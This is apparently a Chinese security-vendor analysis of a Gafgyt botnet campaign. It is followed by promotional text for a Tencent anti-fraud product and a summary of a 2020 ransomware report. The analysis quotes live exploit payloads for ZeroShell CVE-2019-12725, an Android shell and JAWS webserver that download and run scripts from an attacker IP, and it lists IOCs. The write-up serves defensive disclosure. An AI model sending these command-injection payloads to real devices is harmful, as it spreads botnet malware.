GET/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd/tmp;curl -O http[:]//5.206.227.228/zero;sh zero;" HTTP/1.0

分析发现这次攻击利用的是ZeroShell远程代码执行漏洞(CVE-2019-12725),该漏洞在2019年7月被发现,攻击者可以通过构造具有固定特征的请求数据发送至目标系统,从而导致恶意代码执行。(ZeroShell是一套用于服务器和嵌入式设备的Linux发行版,它主要为局域网提供所需要的网络服务)

漏洞攻击成功后通过curl命令下载执行shell脚本zero,zero继续通过curl下载Gafgyt木马bot.x86_64和bot.x86并启动执行,分别为64位和32位木马文件。

bot.x86为Gafgyt僵尸网络家族木马样本,启动后首先打印特征字符串“9xsspnvgc8aj5pi7m28p”。

然后针对Linux服务器、android设备、视频监控设备的80、5555、60001端口进行扫描。

针对开放端口的设备利用ZeroShell远程代码执行漏洞(CVE-2019-12725)攻击,执行payload:

GET/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd/tmp;curl -O http[:]//5.206.227.228/zero;sh zero;"

利用bash shell漏洞攻击,执行payload:

shell[:]cd /data/local/tmp; busybox wgethttp[:]//5.206.227.228/wget -O -> wwww; sh wwww; curl -Ohttp[:]//5.206.227.228/curl; sh curl;rm wwww curl

利用JAWS Webserver未授权shell命令执行漏洞攻击,执行Payload:

GET /shell?cd /tmp;wgethttp[:]//5.206.227.228/jaw;sh jaw;

ZeroShell远程代码执行漏洞(CVE-2019-12725)的攻击流量:


IOCs

IP

5.206.227.228

URL

http[:]//5.206.227.228/zero

http[:]//5.206.227.228/curl

http[:]//5.206.227.228/wget

http[:]//5.206.227.228/k

http[:]//5.206.227.228/bot.x86_64

http[:]//5.206.227.228/bot.x86

http[:]//5.206.227.228/bot.arm5

http[:]//5.206.227.228/bot.arm6

http[:]//5.206.227.228/bot.arm7

http[:]//5.206.227.228/bot.aarch64

http[:]//5.206.227.228/bot.mips

http[:]//5.206.227.228/bot.mipsel

MD5

2520fc7d13ac3876cca580791d1c33a8

cc84fcc23567228337e45c9fbb78699f

10b9f21795e5ffbd52c407617d0bd4ef

38d8de098c7e560a34dabf8c1a2ed5f0

12b021bcd199585e86dd27523010105b

0e12d891a2fe2cecb6781f3e4d3551b4

aa389e7fb64cf274334712ecb3dfd2cd

2dabb8e039a77f0eb67e938d798ab7c4

03a7f039321ffb9938cc67d65c0b6459

a9109419954a421b712d48ea22b0a7b9

52fb891c536fe449b896f0f2cd2490d4

e2cec25584bfec1e56ee82f350dfeaf9

87859507c0d23793c78d86e0963a7a37

ba903efc3d2e37105e57232e7652b85c

891bbf7b562b34332fac12df2c29ddbb

6d9953a03c568ad97595723d1a09b291

aa9e9627ed6aba6415fb45f742f4f8dd

参考链接:

https://www.anquanke.com/vul/id/1030688

https://www.tarlogic.com/advisories/zeroshell-rce-root.txt

https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/

https://github.com/ifding/iot-malware


伴随着业务数字化的深入,传统企业借助数字技术满足不断变化的业务发展需求,但同时也面临着反欺诈服务的一系列迫切问题:➢如何有效打击账号注册、登录环节等上下游分工明确的黑灰产完整产业链?➢如何杜绝羊毛党套利、黄牛党抢单、刷榜刷单等营销欺诈行为?

➢如何才能高效解决交易、信贷场景的线上欺诈问题,快速建设智能风控体系? 

 

在当前在线反欺诈攻防战下,腾讯安全有一款终极“神器”——腾讯安全天御智能风控中台。这款风控中台以AI为核心、以海量黑产对抗模型为基础,提供多场景+全流程的智能风控解决方案,协助解决企业数字化转型中的实际业务问题。

 

值得一提的是,腾讯安全天御的智能风控服务近期入选了Gartner在线反欺诈市场指南,成为中国唯一入选银行级反欺诈服务厂商。

 

你确定不了解下?!

↓↓↓

数字化转型浪潮下,企业如何做好业务风控?

 

看视频没过瘾?

这张长图为你划重点!

↓↓↓

关注【腾讯安全】微信公众号

回复「勒索病毒」获取报告PDF

 

近日,腾讯安全正式对外发布《2020上半年勒索病毒报告》(以下简称“报告”)。《报告》显示,上半年全球大型企业遭受勒索病毒打击的事件依然高频发生。新型勒索病毒层出不穷,技术上不断进化,呈现五大最新攻击态势。腾讯安全也提供从威胁情报到安全产品的整体防护解决方案,协助企业抵御勒索病毒攻击。

 

报告已划好重点,速看:01

勒索病毒危害半年概览

1. 勒索病毒产业链针对政企目标的精确打击、不断革新的加密技能、规模化的商业运作,正在世界范围内持续产生严重危害。2. 整体来看,2020上半年依旧十分活跃,但勒索病毒总的感染情况较去年略有下降。3. 从地区分布看,广东、浙江、山东、河南、上海最为严重,其它省份也有遭受到不同程度攻击。4. 从影响行业看,传统企业、教育、医疗、政府机构遭受攻击最为严重,互联网、金融、能源也遭到勒索病毒攻击影响。02

上半年勒索病毒攻击的主要特点

1.攻击精准,迫使受害者就范

活跃勒索病毒团伙,越来越多地将高价值大型政企机构作为重点打击对象。为了追求利益最大化,多数情况下,攻击者在攻陷企业一台网络资产之后,会利用该资产持续渗透攻陷更多资产,之后大量植入文件加密模块,从而迫使企业在业务系统大面积瘫痪的情况下缴纳赎金。

 

2.不付赎金就公开企业机密

为避免勒索失败,攻击者采取了新的勒索策略:先窃取政企机构敏感数据,之后再对企业资产进行加密。如果企业拒绝缴纳赎金解密,就在暗网“耻辱墙”页面公开企业部分敏感数据进一步实施勒索,如果企业依然拒绝缴纳赎金,勒索团伙会直接公开所窃取的企业敏感数据。

 

3.僵尸网络成勒索病毒传播中坚力量

为了对攻击目标进行精准打击,很多勒索病毒会利用僵尸网络庞大的感染基数进行迅速扩张。新开发出的勒索家族为了快速切入市场,也会选择与僵尸网络进行合作以获得市场知名度。

 

4.勒索病毒技术升级

经过长期的演变,勒索病毒技术上越发成熟,作者也在加密流程的细节上进行优化,从早期的单线程文件加密到针对每个磁盘分区进行多线程加密;从单一的x86可执行病毒版本到增加x64可执行版本等等,受害者更加难以察觉。

 

5.多病毒投放,中文化定制

据观察发现,有攻击者开始与多个勒索病毒家族合作,以避免单一病毒由于安全环境等问题导致的加密失败。同时,更多的勒索病毒开始针对国内市场做优化,例如增加中文版本的勒索信件等。